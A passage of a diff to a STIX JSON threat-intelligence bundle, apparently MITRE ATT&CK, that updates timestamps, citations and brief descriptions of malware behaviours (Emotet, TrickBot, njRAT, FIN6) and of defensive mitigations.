"relationship--02caaeff-7429-444f-bac2-498fe3a73cfd", "type": "relationship", - "modified": "2020-05-29T13:22:53.006Z", + "modified": "2020-07-17T15:58:55.883Z", "created": "2019-02-21T21:17:37.975Z" }, { @@ -125000,7 +130230,7 @@ "relationship_type": "mitigates", "id": "relationship--f9157f58-5dae-48ed-b6fb-73d8aa432626", "type": "relationship", - "modified": "2020-03-27T21:09:28.963Z", + "modified": "2020-10-14T14:52:11.948Z", "created": "2019-03-15T14:49:54.404Z" }, { @@ -126705,13 +131935,18 @@ "description": "Lee, S.. (2019, April 24). Emotet Using WMI to Launch PowerShell Encoded Code. Retrieved May 24, 2019.", "url": "https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/", "source_name": "Carbon Black Emotet Apr 2019" + }, + { + "source_name": "IBM IcedID November 2017", + "url": "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", + "description": "Kessem, L., et al. (2017, November 13). New Banking Trojan IcedID Discovered by IBM X-Force Research. Retrieved July 14, 2020." } ], - "description": "[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing attachments. (Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)", + "description": "[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing attachments. (Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)(Citation: IBM IcedID November 2017)", "relationship_type": "uses", "id": "relationship--cc4f0b64-db39-4546-a5fc-a518ecc5438b", "type": "relationship", - "modified": "2020-07-15T13:03:46.660Z", + "modified": "2020-07-15T18:05:15.557Z", "created": "2019-03-26T19:23:02.065Z" }, { @@ -126809,13 +132044,18 @@ "source_name": "TrendMicro Trickbot Feb 2019", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", "description": "Llimos, N., Pascual, C.. (2019, February 12). Trickbot Adds Remote Application Credential-Grabbing Capabilities to Its Repertoire. Retrieved March 12, 2019." + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], - "description": "[TrickBot](https://attack.mitre.org/software/S0266) has attempted to get users to launch a malicious Excel attachment to deliver its payload. (Citation: TrendMicro Trickbot Feb 2019)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) has attempted to get users to launch malicious documents to deliver its payload. (Citation: TrendMicro Trickbot Feb 2019)(Citation: Cyberreason Anchor December 2019)", "relationship_type": "uses", "id": "relationship--6b55eeb9-c7a1-4ff5-b8ef-f114e3a1b75a", "type": "relationship", - "modified": "2020-03-17T13:48:08.998Z", + "modified": "2020-09-11T13:27:44.782Z", "created": "2019-03-28T14:45:51.193Z" }, { @@ -129246,7 +134486,7 @@ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb", - "target_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "target_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "external_references": [ { "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.", @@ -129317,11 +134557,11 @@ "source_name": "FireEye FIN6 Apr 2019" } ], - "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used Pastebin to host content for the operation.(Citation: FireEye FIN6 Apr 2019)\t\n", + "description": "[FIN6](https://attack.mitre.org/groups/G0037) has used Pastebin and Google Storage to host content for their operations.(Citation: FireEye FIN6 Apr 2019)\t\n", "relationship_type": "uses", "id": "relationship--41ba13d1-5681-402e-a847-08b7e7b12f42", "type": "relationship", - "modified": "2019-06-28T14:59:17.781Z", + "modified": "2020-10-09T13:28:48.778Z", "created": "2019-04-17T15:08:45.097Z" }, { @@ -131918,27 +137158,6 @@ "modified": "2020-03-17T01:01:41.602Z", "created": "2019-04-23T15:49:35.570Z" }, - { - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], - "source_ref": "malware--d6b3fcd0-1c86-4350-96f0-965ed02fcc51", - "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e", - "external_references": [ - { - "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.", - "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/", - "source_name": "ESET Ebury Feb 2014" - } - ], - "description": "[Ebury](https://attack.mitre.org/software/S0377) has used UDP port 53 for C2.(Citation: ESET Ebury Feb 2014)\t", - "relationship_type": "uses", - "id": "relationship--8dde34ad-1b87-4195-a52f-632852fa0c3b", - "type": "relationship", - "modified": "2019-04-26T20:14:18.225Z", - "created": "2019-04-23T15:49:35.580Z" - }, { "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": [ @@ -132690,7 +137909,7 @@ "relationship_type": "mitigates", "id": "relationship--6b392dbc-1f55-4eeb-90b5-3f980a01f11d", "type": "relationship", - "modified": "2020-07-14T19:34:47.765Z", + "modified": "2020-07-24T15:36:08.221Z", "created": "2019-04-24T17:01:10.541Z" }, { @@ -136203,7 +141422,7 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", "target_ref": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "external_references": [ { @@ -136285,16 +141504,21 @@ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", "external_references": [ { - "source_name": "Fidelis njRAT June 2013", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.", "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", - "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + "source_name": "Fidelis njRAT June 2013" + }, + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" } ], - "description": "[njRAT](https://attack.mitre.org/software/S0385) can upload and download files to and from the victim\u2019s machine.(Citation: Fidelis njRAT June 2013)", + "description": "[njRAT](https://attack.mitre.org/software/S0385) can download files to the victim\u2019s machine.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", "relationship_type": "uses", "id": "relationship--168ab4a2-db4d-4d64-9951-6547145aabe6", "type": "relationship", - "modified": "2019-06-24T18:57:11.123Z", + "modified": "2020-10-08T19:05:06.672Z", "created": "2019-06-04T19:48:14.179Z" }, { @@ -136366,19 +141590,24 @@ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], "source_ref": "malware--d906e6f7-434c-44c0-b51a-ed50af8f7945", - "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", "external_references": [ { - "source_name": "Fidelis njRAT June 2013", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.", "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", - "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + "source_name": "Fidelis njRAT June 2013" + }, + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" } ], - "description": "[njRAT](https://attack.mitre.org/software/S0385) is capable of deleting files on the victim.(Citation: Fidelis njRAT June 2013)", + "description": "[njRAT](https://attack.mitre.org/software/S0385) is capable of deleting objects related to itself (registry keys, files, and firewall rules) on the victim.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", "relationship_type": "uses", "id": "relationship--eda42bb5-848f-4e1f-8902-fbda0e20a316", "type": "relationship", - "modified": "2019-06-24T18:57:11.206Z", + "modified": "2020-10-08T18:47:57.579Z", "created": "2019-06-05T13:06:06.476Z" }, { @@ -136390,16 +141619,21 @@ "target_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", "external_references": [ { - "source_name": "Fidelis njRAT June 2013", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.", "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", - "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + "source_name": "Fidelis njRAT June 2013" + }, + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" } ], - "description": "[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)", + "description": "[njRAT](https://attack.mitre.org/software/S0385) can be configured to spread via removable drives.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", "relationship_type": "uses", "id": "relationship--815fff92-274f-467c-a8c0-a623588c6739", "type": "relationship", - "modified": "2019-06-24T18:57:11.209Z", + "modified": "2020-08-03T19:28:18.221Z", "created": "2019-06-05T13:06:06.496Z" }, { @@ -136468,11 +141702,11 @@ "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019." } ], - "description": "[njRAT](https://attack.mitre.org/software/S0385) has added persistence via the Registry key HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", + "description": "[njRAT](https://attack.mitre.org/software/S0385) has added persistence via the Registry key HKCU\\Software\\Microsoft\\CurrentVersion\\Run\\ and dropped a shortcut in %STARTUP%.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", "relationship_type": "uses", "id": "relationship--85482d65-d2ac-4d79-8ee4-da653e73aa8f", "type": "relationship", - "modified": "2019-06-24T18:57:11.308Z", + "modified": "2020-10-08T18:47:57.587Z", "created": "2019-06-05T13:20:24.804Z" }, { @@ -136536,16 +141770,21 @@ "target_ref": "attack-pattern--5372c5fe-f424-4def-bcd5-d3a8e770f07b", "external_references": [ { - "source_name": "Fidelis njRAT June 2013", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.", "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", - "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + "source_name": "Fidelis njRAT June 2013" + }, + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" } ], - "description": "[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)", + "description": "[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", "relationship_type": "uses", "id": "relationship--729d8ddd-b1e1-4076-b98c-3d5497dffd6e", "type": "relationship", - "modified": "2020-03-28T01:01:45.046Z", + "modified": "2020-08-03T19:28:18.299Z", "created": "2019-06-05T13:46:47.839Z" }, { @@ -136735,16 +141974,21 @@ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643", "external_references": [ { - "source_name": "Fidelis njRAT June 2013", + "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019.", "url": "https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf", - "description": "Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: \"njRAT\" Uncovered. Retrieved June 4, 2019." + "source_name": "Fidelis njRAT June 2013" + }, + { + "description": "Pascual, C. (2018, November 27). AutoIt-Compiled Worm Affecting Removable Media Delivers Fileless Version of BLADABINDI/njRAT Backdoor. Retrieved June 4, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/autoit-compiled-worm-affecting-removable-media-delivers-fileless-version-of-bladabindi-njrat-backdoor/", + "source_name": "Trend Micro njRAT 2018" } ], - "description": "[njRAT](https://attack.mitre.org/software/S0385) will attempt to detect if the victim system has a camera during the initial infection.(Citation: Fidelis njRAT June 2013)", + "description": "[njRAT](https://attack.mitre.org/software/S0385) will attempt to detect if the victim system has a camera during the initial infection. [njRAT](https://attack.mitre.org/software/S0385) can also detect any removable drives connected to the system.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)", "relationship_type": "uses", "id": "relationship--30180ece-4504-4b6a-9182-5a2fbe3292df", "type": "relationship", - "modified": "2019-06-24T18:57:11.396Z", + "modified": "2020-08-03T19:28:18.329Z", "created": "2019-06-05T17:05:57.765Z" }, { @@ -138155,7 +143399,7 @@ ], "description": "Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located HKLM\\ SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\CredUI\\EnumerateAdministrators. It can be disabled through GPO: Computer Configuration > [Policies] > Administrative Templates > Windows Components > Credential User Interface: E numerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)", "type": "relationship", - "modified": "2020-03-13T20:07:14.833Z", + "modified": "2020-09-16T15:10:18.399Z", "created": "2019-06-13T16:02:06.717Z" }, { @@ -138487,7 +143731,7 @@ } ], "type": "relationship", - "modified": "2020-03-29T20:35:55.577Z", + "modified": "2020-10-21T16:38:28.187Z", "created": "2019-06-13T16:59:18.369Z" }, { @@ -138501,7 +143745,7 @@ "description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.", "id": "relationship--cb87a0ce-0976-49e5-8e9c-2c908a24b30f", "type": "relationship", - "modified": "2020-03-29T20:35:55.573Z", + "modified": "2020-10-21T16:38:28.180Z", "created": "2019-06-13T16:59:18.386Z" }, { @@ -138515,7 +143759,7 @@ "description": "Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy may create a denial of service condition and render environments un-usable, with all accounts used in the brute force being locked-out.", "id": "relationship--c1a6c86e-5d5d-4cf1-845e-1660d9c19baf", "type": "relationship", - "modified": "2020-03-29T20:35:55.581Z", + "modified": "2020-10-21T16:38:28.185Z", "created": "2019-06-13T16:59:18.442Z" }, { @@ -139212,7 +144456,7 @@ } ], "type": "relationship", - "modified": "2020-03-14T23:19:38.163Z", + "modified": "2020-10-21T02:18:23.371Z", "created": "2019-06-14T17:11:30.497Z" }, { @@ -140389,12 +145633,12 @@ "external_references": [ { "source_name": "Harmj0y Domain Trusts", - "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ ", + "url": "http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/", "description": "Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019." } ], "type": "relationship", - "modified": "2020-03-26T16:13:21.448Z", + "modified": "2020-09-17T18:26:17.835Z", "created": "2019-06-20T14:46:03.508Z" }, { @@ -140876,7 +146120,7 @@ "description": "Ensure proper registry permissions are in place to inhibit adversaries from disabling or interfering with critical services.", "id": "relationship--c00535d0-6e59-4293-8034-70e5bf94a74a", "type": "relationship", - "modified": "2020-07-14T19:34:47.776Z", + "modified": "2020-07-24T15:36:08.247Z", "created": "2019-06-20T16:18:23.049Z" }, { @@ -140890,7 +146134,7 @@ "description": "Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.", "id": "relationship--e28dc4ab-86fe-480e-9f0d-d7fab54c432d", "type": "relationship", - "modified": "2020-07-14T19:34:47.793Z", + "modified": "2020-07-24T15:36:08.246Z", "created": "2019-06-20T16:18:23.056Z" }, { @@ -140904,7 +146148,7 @@ "description": "Operate intrusion detection, analysis, and response systems on a separate network from the production environment to lessen the chances that an adversary can see and interfere with critical response functions.", "id": "relationship--40cd458c-5a59-4a8d-a04a-3cd3faebaf66", "type": "relationship", - "modified": "2020-07-14T19:34:47.795Z", + "modified": "2020-07-24T15:36:08.276Z", "created": "2019-06-20T16:18:23.058Z" }, { @@ -141051,7 +146295,7 @@ "description": "Develop and publish policies that define acceptable information to be stored in repositories.", "id": "relationship--2ffde834-36f9-463d-93c4-77048f020cf9", "type": "relationship", - "modified": "2020-06-30T22:50:06.270Z", + "modified": "2020-10-12T12:16:55.356Z", "created": "2019-06-20T18:55:36.315Z" }, { @@ -141065,7 +146309,7 @@ "description": "Consider periodic review of accounts and privileges for critical and sensitive repositories.", "id": "relationship--eacf09ab-0264-4af8-bfa5-f3be9df47e3f", "type": "relationship", - "modified": "2020-06-30T22:50:06.278Z", + "modified": "2020-10-12T12:16:55.362Z", "created": "2019-06-20T18:55:36.343Z" }, { @@ -141617,7 +146861,7 @@ "description": "Properly configure firewalls and proxies to limit outgoing traffic to only necessary ports and through proper network gateway systems. Also ensure hosts are only provisioned to communicate over authorized interfaces.", "id": "relationship--b2a42d95-fc64-4e6f-95d9-7b24334bccd4", "type": "relationship", - "modified": "2020-03-11T15:09:26.749Z", + "modified": "2020-10-21T19:41:49.600Z", "created": "2019-06-21T15:19:09.776Z" }, { @@ -141631,7 +146875,7 @@ "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.", "id": "relationship--418bde38-35eb-44bc-a454-ad7d2918bda5", "type": "relationship", - "modified": "2020-03-11T15:09:26.773Z", + "modified": "2020-10-21T19:41:49.644Z", "created": "2019-06-21T15:19:09.796Z" }, { @@ -141676,7 +146920,7 @@ } ], "type": "relationship", - "modified": "2020-06-20T22:44:36.276Z", + "modified": "2020-08-04T14:04:58.488Z", "created": "2019-06-21T16:21:55.301Z" }, { @@ -141697,7 +146941,7 @@ } ], "type": "relationship", - "modified": "2020-06-20T22:44:36.303Z", + "modified": "2020-08-04T14:04:58.483Z", "created": "2019-06-21T16:21:55.304Z" }, { @@ -141921,7 +147165,7 @@ "description": "Have a strict approval policy for use of deployment systems.", "id": "relationship--8f4b9d5d-6ad7-4cca-9869-551604450f91", "type": "relationship", - "modified": "2020-02-21T16:31:32.994Z", + "modified": "2020-09-16T15:27:01.622Z", "created": "2019-06-21T17:26:42.085Z" }, { @@ -141935,7 +147179,7 @@ "description": "Patch deployment systems regularly to prevent potential remote access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).", "id": "relationship--33a54656-6370-4c22-af67-4ff528ba1568", "type": "relationship", - "modified": "2020-02-21T16:31:32.999Z", + "modified": "2020-09-16T15:27:01.632Z", "created": "2019-06-21T17:26:42.105Z" }, { @@ -141949,7 +147193,7 @@ "description": "If the application deployment system can be configured to deploy only signed binaries, then ensure that the trusted signing certificates are not co-located with the application deployment system and are instead located on a system that cannot be accessed remotely or to which remote access is tightly controlled.", "id": "relationship--e4236234-0fd7-426f-b55a-d32364e3a64e", "type": "relationship", - "modified": "2020-02-21T16:31:32.996Z", + "modified": "2020-09-16T15:27:01.629Z", "created": "2019-06-21T17:26:42.107Z" }, { @@ -141963,7 +147207,7 @@ "description": "Ensure proper system isolation for critical network systems through use of firewalls.", "id": "relationship--8eaad388-b7ef-4fb8-88e6-c6f36065c8c4", "type": "relationship", - "modified": "2020-02-21T16:31:33.055Z", + "modified": "2020-09-16T15:27:01.623Z", "created": "2019-06-21T17:26:42.110Z" }, { @@ -143135,7 +148379,7 @@ "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.", "id": "relationship--d373eebb-b578-4b59-9de1-2946bf837d96", "type": "relationship", - "modified": "2020-02-18T16:10:39.256Z", + "modified": "2020-10-21T01:10:54.582Z", "created": "2019-06-24T13:44:34.822Z" }, { @@ -143149,7 +148393,7 @@ "description": "Application isolation will limit what other processes and system features the exploited target can access.", "id": "relationship--0c8fdb59-a28f-4f8f-a788-9e3e8928c6d5", "type": "relationship", - "modified": "2020-02-18T16:10:39.254Z", + "modified": "2020-10-21T01:10:54.601Z", "created": "2019-06-24T13:44:34.840Z" }, { @@ -143163,7 +148407,7 @@ "description": "Use least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system.", "id": "relationship--4d50a045-d85d-481f-ac7d-672065f1e348", "type": "relationship", - "modified": "2020-02-18T16:10:39.263Z", + "modified": "2020-10-21T01:10:54.619Z", "created": "2019-06-24T13:44:34.838Z" }, { @@ -143177,7 +148421,7 @@ "description": "Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.", "id": "relationship--3b726298-74dc-4f8a-b58d-f623bc645124", "type": "relationship", - "modified": "2020-02-18T16:10:39.259Z", + "modified": "2020-10-21T01:10:54.643Z", "created": "2019-06-24T13:44:34.852Z" }, { @@ -143810,7 +149054,7 @@ "description": "Restrict write access to logon scripts to specific administrators.", "id": "relationship--d32467b1-8d30-4134-ac6d-541cb623f8c2", "type": "relationship", - "modified": "2020-03-24T23:07:28.484Z", + "modified": "2020-08-03T16:47:37.403Z", "created": "2019-06-24T14:22:08.049Z" }, { @@ -144102,7 +149346,7 @@ } ], "type": "relationship", - "modified": "2020-03-26T17:17:42.604Z", + "modified": "2020-09-29T14:48:07.375Z", "created": "2019-06-24T16:27:16.770Z" }, { @@ -144219,7 +149463,7 @@ "description": "Use application control where appropriate.", "id": "relationship--87fd0088-41da-47ac-bd69-a8ac151a0d39", "type": "relationship", - "modified": "2020-06-25T03:19:34.222Z", + "modified": "2020-10-21T16:09:10.707Z", "created": "2019-06-24T18:00:41.676Z" }, { @@ -144410,13 +149654,18 @@ "description": "Anthony, N., Pascual, C.. (2018, November 1). Trickbot Shows Off New Trick: Password Grabber Module. Retrieved November 16, 2018.", "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module/", "source_name": "Trend Micro Trickbot Nov 2018" + }, + { + "source_name": "Cyberreason Anchor December 2019", + "url": "https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware", + "description": "Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September 10, 2020." } ], - "description": "[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge.(Citation: Trend Micro Trickbot Nov 2018)", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using [esentutl](https://attack.mitre.org/software/S0404).(Citation: Trend Micro Trickbot Nov 2018)(Citation: Cyberreason Anchor December 2019)", "relationship_type": "uses", "id": "relationship--f0dd2703-4846-47b5-a8d8-471f70f9968e", "type": "relationship", - "modified": "2019-06-24T19:15:06.328Z", + "modified": "2020-10-17T15:05:15.989Z", "created": "2019-06-24T19:15:06.328Z" }, { @@ -144948,7 +150197,7 @@ "description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.", "id": "relationship--81bb4898-aaa2-4dff-9af8-a97e6b69a95a", "type": "relationship", - "modified": "2020-03-29T22:52:56.021Z", + "modified": "2020-08-13T20:02:49.812Z", "created": "2019-06-25T12:31:57.676Z" }, { @@ -145425,7 +150674,7 @@ "description": "Block unknown devices and accessories by endpoint security configuration and monitoring agent.", "id": "relationship--b28f8635-6a79-4be1-b05a-b4356a04e7c2", "type": "relationship", - "modified": "2020-07-14T19:36:40.746Z", + "modified": "2020-09-16T16:12:48.247Z", "created": "2019-06-25T14:33:33.684Z" }, { @@ -145446,7 +150695,7 @@ } ], "type": "relationship", - "modified": "2020-07-14T19:36:40.741Z", + "modified": "2020-09-16T16:12:48.266Z", "created": "2019-06-25T14:33:33.700Z" }, { @@ -147592,7 +152841,7 @@ "description": "Enforce the principle of least-privilege. Consider implementing access control mechanisms that include both authentication and authorization.", "id": "relationship--8b3f2915-ca04-4770-88bb-e6f1314da34d", "type": "relationship", - "modified": "2020-06-30T22:50:06.318Z", + "modified": "2020-10-12T12:16:55.383Z", "created": "2019-07-17T18:51:33.926Z" }, { @@ -147784,7 +153033,7 @@ "description": "Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.", "id": "relationship--53a95297-1cce-401c-99a3-34079e878fac", "type": "relationship", - "modified": "2020-02-18T16:10:39.253Z", + "modified": "2020-10-21T01:10:54.658Z", "created": "2019-07-17T20:50:44.740Z" }, { @@ -147805,7 +153054,7 @@ } ], "type": "relationship", - "modified": "2020-07-14T22:22:06.471Z", + "modified": "2020-10-21T01:10:54.681Z", "created": "2019-07-17T21:07:56.528Z" }, { @@ -148392,7 +153641,7 @@ "description": "Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.", "id": "relationship--4b5e8e16-ddf4-4339-859b-f70f980d612b", "type": "relationship", - "modified": "2020-07-01T18:27:41.895Z", + "modified": "2020-10-21T15:30:45.150Z", "created": "2019-07-18T17:11:15.628Z" }, { @@ -148706,7 +153955,7 @@ "description": "Verify that account credentials that may be used to access deployment systems are unique and not used throughout the enterprise network.", "id": "relationship--7a20546a-c6be-4c1b-8b41-23cfb551f933", "type": "relationship", - "modified": "2020-02-21T16:31:33.051Z", + "modified": "2020-09-16T15:27:01.620Z", "created": "2019-07-18T19:06:27.491Z" }, { @@ -148720,7 +153969,7 @@ "description": "Grant access to application deployment systems only to a limited number of authorized administrators.", "id": "relationship--43eebb80-4b8a-4690-a7e3-5f6f8e08db9f", "type": "relationship", - "modified": "2020-02-21T16:31:33.056Z", + "modified": "2020-09-16T15:27:01.625Z", "created": "2019-07-18T19:07:50.184Z" }, { @@ -148748,7 +153997,7 @@ "description": "Limit privileges of user accounts and groups so that only authorized administrators can interact with service changes and service configurations.", "id": "relationship--b5023b20-4243-4686-8b51-429ae7ac73cb", "type": "relationship", - "modified": "2020-07-14T19:34:47.808Z", + "modified": "2020-07-24T15:36:08.273Z", "created": "2019-07-18T19:18:32.950Z" }, { @@ -148844,7 +154093,7 @@ "description": "Ensure proper system and access isolation for critical network systems through use of multi-factor authentication.", "id": "relationship--c869db21-9c91-4449-b316-408bcab56e1b", "type": "relationship", - "modified": "2020-02-21T16:31:33.054Z", + "modified": "2020-09-16T15:27:01.690Z", "created": "2019-07-18T20:58:45.951Z" }, { @@ -149005,7 +154254,7 @@ "description": "Ensure proper system and access isolation for critical network systems through use of group policy.", "id": "relationship--147b8bb5-ca4e-455e-a5b9-f0ab118c67eb", "type": "relationship", - "modified": "2020-02-21T16:31:33.037Z", + "modified": "2020-09-16T15:27:01.618Z", "created": "2019-07-18T21:16:43.793Z" }, { @@ -149019,7 +154268,7 @@ "description": "Filter network traffic to prevent use of protocols across the network boundary that are unnecessary.", "id": "relationship--9acd9add-9b08-45dd-8135-98e62eb708e2", "type": "relationship", - "modified": "2020-03-11T15:09:26.774Z", + "modified": "2020-10-21T19:41:49.665Z", "created": "2019-07-18T21:18:02.951Z" }, { @@ -149047,7 +154296,7 @@ "description": "Ensure that any accounts used by third-party providers to access these systems are traceable to the third-party and are not used throughout the network or used by other third-party providers 